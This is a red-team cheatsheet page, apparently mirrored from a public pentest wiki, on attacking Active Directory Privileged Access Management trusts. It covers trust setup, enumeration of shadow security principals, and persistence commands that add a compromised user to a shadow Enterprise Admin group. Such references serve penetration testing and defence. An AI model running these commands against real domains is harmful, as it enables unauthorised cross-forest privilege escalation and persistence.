daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

trust-pam.md (2789B)


      1 ---
      2 title: "Trust - Privileged Access Management"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/trust-pam.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/trust-pam.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Trust - Privileged Access Management
     12 
     13 > PAM (Privileged Access Management) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon.
     14 
     15 Requirements:
     16 
     17 * Windows Server 2016 or earlier
     18 
     19 If we compromise the bastion we get `Domain Admins` privileges on the other domain
     20 
     21 * Default configuration for PAM Trust
     22 
     23     ```ps1
     24     # execute on our forest
     25     netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes 
     26     netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes 
     27     netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes 
     28     netdom trust lab.local /domain:bastion.local /Quarantine:No
     29     # execute on our bastion
     30     netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes
     31     ```
     32 
     33 * Enumerate PAM trusts
     34 
     35     ```ps1
     36     # Detect if current forest is PAM trust
     37     Import ADModule
     38     Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
     39 
     40     # Enumerate shadow security principals 
     41     Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
     42 
     43     # Enumerate if current forest is managed by a bastion forest
     44     # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External
     45     Get-ADTrust -Filter {(ForestTransitive -eq $True)} 
     46     ```
     47 
     48 * Compromise
     49     * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...)
     50     * Using SID History
     51 * Persistence
     52     * Windows/Linux:
     53 
     54     ```ps1
     55     bloodyAD --host 10.1.0.4 -u john.doe -p 'Password123!' -d bloody add groupMember 'CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local' Administrator
     56     ```
     57 
     58     * Windows only:
     59 
     60     ```ps1
     61     # Add a compromised user to the group 
     62     Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"}
     63     ```
     64 
     65 ## References
     66 
     67 * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)